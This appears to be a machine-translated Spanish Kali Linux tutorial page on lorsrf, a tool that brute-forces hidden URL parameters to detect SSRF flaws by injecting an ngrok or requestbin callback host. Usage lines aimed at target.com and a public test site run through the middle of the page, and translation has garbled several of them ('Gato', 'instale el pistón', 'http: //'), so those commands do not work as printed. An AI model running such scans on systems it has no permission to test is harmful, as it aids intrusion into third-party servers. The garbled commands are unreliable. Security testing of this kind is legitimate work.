Tutoriales

Parámetros SSRF Bruteforce !!! Tutoriales de Kali Linux

Lorsrf se ha agregado a scant3r con adiciones útiles (método multi http, tipo de contenido múltiple (json, consulta, xml, velocidad, Worlist grande y más)). Fuerza bruta en parámetros ocultos para encontrar vulnerabilidades SSRF con GET y POST Métodos

Instalar

➜ Clon de Git https://github.com/knassar702/lorsrf
➜ CD Lorsrf
➜ sudo pip3 instale el pistón

Instale la herramienta Ngrok

pasos

falda

  • guía a tu ngrok ./ngrok http 9090
  • Correr server.py Script y agregue el puerto ngrok python3 server.py 9090
  • Correr lorsrf.py y agregue el host ngrok -s oportunidad

requestbin.com

  • Inicie sesión en https://requestbin.com
  • Copie y agregue su host usando -s Opción (sin server.py Expediente)

¿Como puedo usar lo?

Gato YOUR_LIST.txt | python3 lorsrf.py -t URL_TARGET -s YOUR_HOST -w lista de palabras.txt

Ejemplos de

$ cat parameter.txt | python3 lorsrf.py -t http://target.com -shttp: //53252.ngrok.io

Agregar hilos

$ cat parameter.txt | python3 lorsrf.py -t http://target.com -s http://53252.ngrok.io -threads = 50

Agregar tiempo de espera

$ cat parameter.txt | python3 lorsrf.py -t http://target.com -s http://53252.ngrok.io –Tiempo de espera = 4

Agregar cookies

$ Parámetros de gato.txt | python3 lorsrf.py -t http://target.com -s http://53252.ngrok.io -c ‘usuario = 5 & PHPSESSION = 5232’

Agregar encabezados desde un archivo de texto

PScat headers.txt
Cookie: prueba = 1
Auth: Basic TG9yU3JmCg ==
$ cat Parameter.txt | python3 lorsrf.py -f headers.txt -s ‘http://myhost.com’ -t ‘http://ssrf.hack.com’
GET /? Parámetro = YOUR_HOST HTTP / 1.1
Alojado por targer.com
Cookie: prueba = 1
Auth: Basic TG9yU3JmCg ==

El reenvío seguirá

$ cat parameter.txt | python3 lorsrf.py -t http://target.com -s http: // 53252.ngrok.io -r

Pruebas

python3 lorsrf.py -t ‘http://testphp.vulnweb.com/showimage.php’ -s ‘https://IHR_HOST.com’ -w parámetros.txt

GIF

LEER  La computadora portátil TUXEDO InfinityBook S 15 Linux se lanza con CPU Tiger Lake, diseño ultra delgado

Publicaciones relacionadas

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Botón volver arriba